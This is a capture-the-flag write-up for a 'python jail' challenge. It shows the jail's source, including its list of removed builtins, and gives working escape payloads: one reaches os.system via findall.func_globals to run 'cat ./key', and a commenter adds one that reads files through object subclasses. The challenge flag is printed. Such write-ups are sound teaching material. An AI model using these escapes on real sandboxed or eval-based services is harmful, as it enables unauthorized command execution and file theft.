7 – python jail
You are surrounded by zombies. You heard there’s a safe house nearby, but climbing fences is hard with a beer belly. Thank god, there’s another surviver over there. “Hey! Help me!”, you shout. He just laughs and shakes you off the fence. Asshole.
Later, you see his dead body lying in front of a high security door secured by automated weapons. Heh… karma is a bitch. But that means you’ll have to find another way in. In this nerd area, all the doors are secured with stupid computer puzzles. So, what the heck. Better try this one:
ctf.fluxfingers.net tcp/2045
Hint:
You’ll find the entrance in “./key”Notes:
This challenge is a tribute to PHDays Finals 2012 challenge ‘ndevice’.
Thanks again, I had fun solving it.I’m fairly certain that this challenge avoids being exploitable by
the tricks we could use in PHDays (the module “os” was imported…).
So, no advantage for people who did not attend PHDays.
Summary: python eval tricks
def make_secure(): UNSAFE_BUILTINS = ['open', 'file', 'execfile', 'compile', 'reload', '__import__', 'eval', 'input'] ## block object? for func in UNSAFE_BUILTINS: del __builtins__.__dict__[func] from re import findall make_secure() while True: try: inp = findall('\S+', raw_input())[0] a = None exec 'a=' + inp print 'Return Value:', a except Exception, e: print 'Exception:', e |
There many solutions for this level. For example, we can use findall function’s globals to get sys module, then os and system:
$ nc ctf.fluxfingers.net 2045 Go Ahead, Expoit me >;D findall.func_globals['sys'].modules['os'].system("cat\x20./key") findall.func_globals['sys'].modules['os'].system("cat\x20./key") FvibLF0eBkCBk Return Value: 0 |
The flag: FvibLF0eBkCBk
1 comment
Oh nice thanks for the trick ; here is mine:().__class__.__base__.__subclasses__()[40](‘./key’,’r’).read()